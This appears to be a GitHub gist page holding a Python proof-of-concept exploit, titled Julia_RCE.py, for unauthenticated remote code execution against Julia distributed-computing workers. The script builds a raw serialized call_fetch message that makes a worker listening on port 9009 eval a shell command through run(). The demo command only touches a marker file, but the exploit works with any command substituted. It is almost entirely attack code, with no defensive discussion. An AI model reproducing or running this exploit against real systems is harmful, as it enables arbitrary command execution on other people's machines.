Skip to content

Instantly share code, notes, and snippets.

@bwall bwall/Julia_RCE.py Secret
Created Apr 27, 2016

Embed
What would you like to do?
import socket
import time
import struct
from random import randint
TCP_IP = "192.168.213.132" # IP address of a worker
TCP_PORT = 9009 # Port the worker is binding to
def test_packet(packet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(packet)
time.sleep(1)
s.close()
def encode_length(l):
if l <= 32:
return chr(l + 126)
else:
return "\x09" + struct.pack("<Q", l)
second_incrementer = encode_length(int(time.time())) # We use the time stamp for our response_oid because we essentially want a sufficiently high number that continually increments
command = "touch /tmp/code_execution_confirmed" # This is the command we wish to run, the Julia code has been setup to run "run(`command`)"
command_length = encode_length(len(command))
packet = '\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00\x02\ncall_fetch\x13\x01"\n' + struct.pack(">I", int(time.time())) + '\x00\x10\x00\x00\x16\x03:1\x151~\x151\x82\x151~\x151~~\x151~\x16\x03;1\x1a\x02\x08multi.jl\tr\x05\x00\x00\x00\x00\x00\x00\x16\x03=1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x04eval\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x04Main\x16\x01\x02\x07copyast1\x1e\x16\x02=1\x02\x03run\x16\x02\x02\tmacrocall1\x02\x04@cmd&' + '\x15' + command_length + command + '\x16\x01<1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07nothing\x151~+\x00\x00\x00\x00{#/}+\x00\x00\x00\x00/\x14\x02\x7f' + second_incrementer
test_packet(packet)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.